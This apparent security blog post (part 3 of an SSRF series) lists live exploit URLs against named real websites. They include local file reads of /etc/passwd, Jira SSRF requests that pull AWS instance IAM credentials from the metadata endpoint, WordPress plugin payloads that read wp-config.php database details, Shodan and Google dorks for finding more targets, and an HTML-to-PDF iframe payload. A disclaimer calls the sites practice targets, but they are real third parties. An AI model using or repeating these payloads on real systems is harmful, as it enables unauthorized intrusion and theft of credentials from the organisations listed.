SSRF — Server Side Request Forgery (Types and ways to exploit it) Part-3
Lets get in to Live Examples
The author of this BLOG is no way responsible for any misuse of the information.
4. Live Examples -
Lets look in to basic SSRF
https://robert-brook.com/parliament/index.php?page=http://www.parliament.uk/business/news/2019/parliamentary-news-2019/this-week-in-the-commons-friday-25-january-2019/
Here the page parameter fetch external resource and display its content
SSRF to XSS -
https://robert-brook.com/parliament/index.php?page=http://brutelogic.com.br/poc.svg
Read Local files -
https://robert-brook.com/parliament/index.php?page=file:///etc/passwd
When you try other URL schemas like DICT gives an error
Warning: file_get_contents(): Unable to find the wrapper “dict” — did you forget to enable it when you configured PHP
This indicates DICT URL schemas is not enabled
In the same way you can try other URL schemas and find which all are enabled and use them to exploit it further
SSRF in FFMPEG -
Read local files
Working vulnerable site -
https://www.onlinevideoconverter.com/
https://www.files-conversion.com/
Repo Link - https://github.com/neex/ffmpeg-avi-m3u-xbin
SSRF in Widely used Plugins and CMS -
SSRF in Jira -
Jira version < 7.3.5 are suffering from SSRF
https://<JIRA_BASEPATH>/plugins/servlet/oauth/users/icon-uri?consumerUri=…
There are more than 40k jira sites on shodan. You can find them using below dorks
X-AUSERNAME: anonymous
X-AUSERNAME: anonymous org:"Amazon.com" -- For aws
X-AUSERNAME: anonymous org:"Microsoft Azure" -- For Azure
X-AUSERNAME: anonymous org:"google" -- For Google
Now lets see some vulnerable Sites
https://jira.majesco.com/plugins/servlet/oauth/users/icon-uri?consumerUri=https://google.comhttps://jira.intellectdesign.com/plugins/servlet/oauth/users/icon-uri?consumerUri=https://google.comhttps://team.asg.com/plugins/servlet/oauth/users/icon-uri?consumerUri=https://google.comhttps://jira.magnitude.com/https://tickets.metabrainz.org/plugins/servlet/oauth/users/icon-uri?consumerUri=https://google.comhttps://support.eu.evertz.com/jira/plugins/servlet/oauth/users/icon-uri?consumerUri=https://google.comhttps://jira.dhis2.org/plugins/servlet/oauth/users/icon-uri?consumerUri=https://google.comhttps://jira.vectormediagroup.com/plugins/servlet/oauth/users/icon-uri?consumerUri=http://169.254.169.254/latest/ -- Aws Details https://mattel.cprime.com/jira/plugins/servlet/oauth/users/icon-uri?consumerUri=https://google.comhttp://adoptivefam.org/plugins/servlet/oauth/users/icon-uri?consumerUri=https://google.comhttps://jira.iea-dpc.org/plugins/servlet/oauth/users/icon-uri?consumerUri=https://google.comhttps://jira.fellowshipchurch.com:8443/plugins/servlet/oauth/users/icon-uri?consumerUri=https://google.comhttps://jira.soleus.nu/plugins/servlet/oauth/users/icon-uri?consumerUri=https://google.comhttp://jira.succraft.com:8080/plugins/servlet/oauth/users/icon-uri?consumerUri=https://google.comhttps://tickets.metabrainz.org/plugins/servlet/oauth/users/icon-uri?consumerUri=https://google.comhttp://support.make-my-day.co.nz/plugins/servlet/oauth/users/icon-uri?consumerUri=https://google.comhttp://52.202.112.34/plugins/servlet/oauth/users/icon-uri?consumerUri=http://169.254.169.254/latest/meta-data/iam/security-credentials/SystemsManagerRole -- Aws Detailshttps://jira.canallabs.fr/plugins/servlet/oauth/users/icon-uri?consumerUri=http://169.254.169.254/latest/meta-data/profile -- Aws Detailshttp://54.247.191.19/plugins/servlet/oauth/users/icon-uri?consumerUri=http://169.254.169.254/latest/meta-data -- Aws Detailshttp://52.22.123.239/plugins/servlet/oauth/users/icon-uri?consumerUri=http://169.254.169.254/latest/meta-data -- Aws Detailshttp://52.22.123.239/plugins/servlet/oauth/users/icon-uri?consumerUri=http://169.254.169.254/latest/meta-data/identity-credentials/ec2/security-credentials/ec2-instance -- Aws Detailshttps://devops.deviate.net.nz/projects/plugins/servlet/oauth/users/icon-uri?consumerUri=http://169.254.169.254/latest/meta-data/identity-credentials/ec2/security-credentials/ec2-instance -- Aws Detailshttps://52.73.101.120/plugins/servlet/oauth/users/icon-uri?consumerUri=http://169.254.169.254/latest/meta-data/iam/security-credentials/BitbucketRole -- Aws Details
These are some vulnerable sites I found
SSRF in JSmol2WP Wordpress Plugin -
JSmol2WP version below 1.07 has an Unauthenticated Server Side Request Forgery
http://localhost:8080/wp-content/plugins/jsmol2wp/php/jsmol.php?isform=true&call=getRawDataFromDatabase&query=php://filter/resource=../../../../wp-config.php
Dork -
inurl:wp-content/plugins/jsmol2wp
Vulnerable sites -
https://www.vivelab12.fr/wp-content/plugins/jsmol2wp/php/jsmol.php?isform=true&call=getRawDataFromDatabase&query=php://filter/resource=../../../../wp-config.php -- DB detailshttp://thasso.com/wp-content/plugins/jsmol2wp/php/jsmol.php?isform=true&call=getRawDataFromDatabase&query=https://google.com -- Fetch google.comhttp://www.ch.ic.ac.uk/rzepa/blog/wp-content/plugins/jsmol2wp/php/jsmol.php?isform=true&call=getRawDataFromDatabase&query=php://filter/resource=../../../../wp-config.php -- DB details
SSRF in Qards Wordpress Plugin -
Qards is vulnerable to Server Side Request Forgery (SSRF)
http://target/wp-content/plugins/qards/html2canvasproxy.php?url=http://google.com
Dork -
inurl:wp-content/plugins/qards
Vulnerable sites -
http://www.horlovia-chemicals.ch/wordpress/wp-content/plugins/qards/html2canvasproxy.php?url=http://google.comhttps://vfsgroup.com.au/wp-content/plugins/qards/html2canvasproxy.php?url=http://google.comhttps://mrgoatygelato.com.au/wp-content/plugins/qards/html2canvasproxy.php?url=http://google.comhttps://arturolopezvalerio.com/wp-content/plugins/qards/html2canvasproxy.php?url=http://google.comhttps://hooverwellness.com/wp-content/plugins/qards/html2canvasproxy.php?url=http://google.com
SSRF in HTML to PDF conversion -
Vulnerable sites -
https://pdfcrowd.com/#convert_by_input
https://convertio.co/html-pdf/
Content of Ssrf.html
"><iframe src="file:///etc/passwd"></iframe>"><svg/onload=document.write(document.location)> -- to know the path and some times to know what os they are using at backend
All these sites posted above are just to let you practice , I am not responsible for any misuse of the information.